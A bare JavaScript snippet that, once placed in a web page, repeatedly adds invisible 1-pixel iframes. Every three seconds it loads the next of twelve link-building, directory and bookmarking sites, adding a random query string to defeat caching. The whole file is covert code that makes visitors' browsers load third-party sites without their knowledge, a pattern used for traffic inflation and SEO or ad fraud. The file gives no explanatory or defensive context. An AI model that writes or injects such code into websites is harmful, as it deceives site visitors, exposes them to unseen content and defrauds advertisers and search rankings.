var ms    	= 3000;
var indexme = -1;
var linksx 	= ['http://www.gainworx-linkbuilding.com','http://www.gaindirectory.com','http://www.gaintronix.eu','http://www.gainworx-markets.com','http://www.gainworx-sales.com','http://www.bookmarksmy.com','http://www.cash21.info','http://www.followbookmarks.com','http://dir.gainworx-sales.com','http://dir.gainworx-markets.com','http://www.gainworx.com','http://www.gainworx-soft.com'];

function makeFrame(src) {
	try{
		var ifrm = document.createElement("IFRAME");
		ifrm.setAttribute("src", src+'?_path='+Math.random());
		ifrm.style.width = 1+"px";
		ifrm.style.height = 0+"px";
		document.body.appendChild(ifrm);
	} catch (e) {};
}



function addFrames() {
	indexme++;
	if (indexme>=linksx.length) indexme=0;
	var link = linksx[indexme];
	makeFrame(link);
	window.setTimeout(function(){
		addFrames();
	}, ms);

}

addFrames();

